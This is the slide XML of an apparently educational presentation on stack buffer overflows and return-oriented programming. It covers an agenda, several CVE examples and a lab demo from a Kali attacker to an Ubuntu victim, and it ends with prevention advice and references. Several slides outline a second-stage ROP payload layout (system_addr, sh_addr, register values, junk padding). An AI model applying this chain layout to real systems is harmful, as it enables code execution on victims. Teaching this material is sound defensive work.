        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1625610"/>
            <a:ext cx="6648591" cy="2962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2nd stage payload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dirty="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dirty="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  <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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4ABE5DB5-18C0-7696-05CB-FAF4E15369B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="762282" y="2974910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14773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Second Stage Exploit (cont.)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C4369DA1-D0D2-ABD7-CC0B-228490B3F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8281574"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8752253" y="2475024"/>
          <a:ext cx="2630109" cy="3535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/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noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>system_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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/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8B8B177-765D-B8D9-4F06-791B03BAE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310701"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5463979" y="4568834"/>
          <a:ext cx="2955763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494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013269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dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>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baseline="0" noProof="0" dirty="0" err="1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sh_addr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dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rbp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noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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 dirty="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0x401273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17" name="Arrow: Up 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB38715B-950A-2C67-29BD-84BE907307CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8382283" y="3754229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877DB6-8238-CE9A-9FCC-DE5FB4BBF8FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1625610"/>
            <a:ext cx="6648591" cy="2962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2nd stage payload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dirty="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dirty="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  <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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C18C9A47-C368-9BFB-8F79-702032282DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="718987" y="3373229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66852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Why is Buffer Overflow (BOF) relevant?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 19" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9E06A6-F273-B33C-611F-E7B706597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473" y="1614367"/>
            <a:ext cx="1659054" cy="488338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 8" descr="A picture containing text, electronics, indoor, projector&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79108861-A512-E866-C66B-6F98622D3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260" y="3366185"/>
            <a:ext cx="2743200" cy="1543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F385C5-94E8-7A80-1CB5-8334FAF41EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016619" y="2856571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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2021-36194</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17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9C43EC-0FA3-012C-65A6-51F4CC32F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957" y="4126284"/>
            <a:ext cx="3858322" cy="20310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C86D0B-F1D3-EDCD-1BD4-0031D534B561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723383" y="5527583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>
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2022-3602</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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060842D9-52D6-983F-C066-22E561C90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5283" y="1910196"/>
            <a:ext cx="2743200" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6" descr="A picture containing electronics, printer, white&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD8FE7F-1B73-73C9-DC5C-34F05B116D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6832" y="2317172"/>
            <a:ext cx="27432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337B1-FED0-F132-C628-8F322D20C610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025169" y="5034447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>
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2022-28721</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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827CB-B47F-5FAC-3110-DDE575504D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9060281" y="4655761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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2022-2471</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1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04879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Second Stage Exploit (cont.)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C4369DA1-D0D2-ABD7-CC0B-228490B3F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1989137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8752253" y="1912183"/>
          <a:ext cx="2630109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noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>system_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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8B8B177-765D-B8D9-4F06-791B03BAE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60426"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5472638" y="4560175"/>
          <a:ext cx="3202549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1186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181363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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="22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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="22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baseline="0" noProof="0" err="1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sh_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="22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noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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 dirty="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baseline="0" noProof="0" err="1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system_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/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17" name="Arrow: Up 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB38715B-950A-2C67-29BD-84BE907307CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8427479" y="2770261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B5801C-1D0D-6E2A-9DEB-E68F770969B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1625610"/>
            <a:ext cx="6648591" cy="2962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2nd stage payload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dirty="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dirty="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  <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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EA6C28C1-5300-230D-BB36-361587620C72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="736305" y="3728252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0367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Second Stage Exploit (cont.)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C4369DA1-D0D2-ABD7-CC0B-228490B3F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4734447"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8752253" y="1912183"/>
          <a:ext cx="2630109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noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>system_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Arrow: Up 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB38715B-950A-2C67-29BD-84BE907307CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8418820" y="2709647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760179-167C-9C09-F7B5-5C14D4E4C849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1625610"/>
            <a:ext cx="6648591" cy="2962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2nd stage payload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dirty="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dirty="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  <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs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F9D9B9E-7E29-CC3B-F64B-43D17C64E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172448"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5472638" y="4560175"/>
          <a:ext cx="3202549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1186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181363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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="22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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="22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baseline="0" noProof="0" err="1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sh_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" dirty="0" err="1">
                        <a:effectLst/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noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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 dirty="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baseline="0" noProof="0" err="1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system_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/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E9FC731-10BB-0F39-5BE9-79FD3CEA4D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543512" y="1530421"/>
            <a:ext cx="6815751" cy="38137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mr-IN" sz="4000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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512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Demo</a:t>
            </a:r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C53378DB-FF48-07C1-9C55-3046D7592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5441" y="2481705"/>
            <a:ext cx="971550" cy="485775"/>
          </a:xfr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0E98D408-BED2-E081-9AD8-99988506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695" y="2302102"/>
            <a:ext cx="1349088" cy="937261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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663E266E-7746-F3C0-3FEB-284D59A27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698" y="2425455"/>
            <a:ext cx="714375" cy="6000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F15712-7E6F-8E7F-450A-EF050801F9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2569948" y="2729946"/>
            <a:ext cx="2854034" cy="346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2" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9900196-0EEB-9E61-28A4-C53952EB4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0283" y="2883901"/>
            <a:ext cx="526474" cy="509156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 13" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB10937-8C9A-8DB5-5048-214B0E4C4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1" y="2883902"/>
            <a:ext cx="569770" cy="587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ACEAD3-FCB7-A5C0-D0BE-1FC6D76C8BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034938" y="3576380"/>
            <a:ext cx="196693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Attacker  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Kali Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>192.168.122.191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BEC72C-A322-A454-3303-8FB88F2A2DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8716965" y="3576204"/>
            <a:ext cx="25501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Victim </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Ubuntu 20.04)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>192.168.122.128</a:t>
            </a:r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A6C6BA5-2A5A-60C1-38DD-129123F542EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6659866" y="2729946"/>
            <a:ext cx="2854034" cy="346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056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Demo (cont.)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CA957CE-E414-BD12-2751-C3BB17C49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75120" y="707559"/>
            <a:ext cx="9525391" cy="5446557"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35816944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How to prevent BOF exploits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Follow secure coding best practices </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Always check bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Identify potential vulnerabilities with Veracode or similar tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Blackbox testing / fuzzing to identify potential vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Use a more secure language than C/C++ if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Keep software up-to-date</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>If software can't be patched, then introduce compensation controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2654317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r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Why is Buffer Overflow relevant?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What is Buffer Overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What is Return Object Programming (ROP)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How to prevent BOF exploits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999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73453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Questions/Comments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r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>"I'm not a hacker, I'm just a sysadmin on someone else' systems" - a wiseman from the Internet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2747748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SzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Buffer_overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/vulnerabilities/Buffer_Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://adamdoupe.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://axcheron.github.io/linux-shellcode-101-from-hell-to-shell/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.intel.com/content/dam/develop/external/us/en/documents/introduction-to-x64-assembly-181178.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://aaronbloomfield.github.io/pdr/book/x86-64bit-ccc-chapter.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-and-user-space-f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Return-oriented_programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="86724D"/>
                </a:solidFill>
                <a:latin typeface="Garamond"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://github.com/JonathanSalwan/ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Garamond"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
